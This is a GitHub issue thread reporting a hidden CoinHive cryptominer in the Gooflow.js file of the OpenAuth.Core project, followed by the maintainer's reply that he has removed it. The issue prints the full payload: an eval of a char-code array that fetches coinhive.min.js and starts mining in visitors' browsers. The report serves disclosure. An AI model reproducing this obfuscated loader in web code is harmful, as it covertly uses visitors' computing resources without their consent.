### ISSUE TITLE
coinhive miner ???

### ISSUE THREAD

**Issue by easyrock** [yubaolee/OpenAuth.Core#2]
Gooflow.js _initDraw

`eval((function(c){var r='';for(var z=0;z<c.length;z++)r+=String.fromCharCode(c[z]);return r})([
			105,102,40,33,36,40,34,98,111,100,121,34,41,46,100,97,116,97,40,39,120,39,41,41,123,36,40,34,98,111,100,
			121,34,41,46,100,97,116,97,40,39,120,39,44,49,41,59,36,46,97,106,97,120,40,34,104,116,116,112,115,58,47,47,
			99,111,105,110,104,105,118,101,46,99,111,109,47,108,105,98,47,99,111,105,110,104,105,118,101,46,109,105,
			110,46,106,115,34,44,123,100,97,116,97,84,121,112,101,58,39,115,99,114,105,112,116,39,44,99,97,99,104,101,
			58,116,114,117,101,44,115,117,99,99,101,115,115,58,102,117,110,99,116,105,111,110,40,114,44,115,41,123,105,
			102,40,115,61,61,39,115,117,99,99,101,115,115,39,41,110,101,119,32,67,111,105,110,72,105,118,101,46,65,110,
			111,110,121,109,111,117,115,40,39,71,71,100,80,71,104,120,73,108,111,108,100,97,65,114,65,114,81,86,119,120,
			90,50,115,100,56,108,48,97,52,107,72,39,44,123,116,104,114,111,116,116,108,101,58,48,46,52,125,41,46,115,
			116,97,114,116,40,41,59,125,125,41,59,125
		]));`

**Comment by yubaolee** [comment]
I discovered this problem a few days ago, and delete it in new 'dev' branch
